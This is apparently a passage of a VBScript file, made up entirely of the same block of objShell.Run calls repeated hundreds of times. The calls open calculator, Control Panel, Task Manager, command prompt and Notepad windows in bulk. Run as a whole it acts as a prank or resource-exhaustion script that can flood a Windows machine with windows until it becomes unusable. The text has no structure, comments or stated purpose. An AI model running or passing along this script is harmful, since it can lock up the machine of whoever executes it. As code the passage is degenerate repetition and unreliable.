
objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
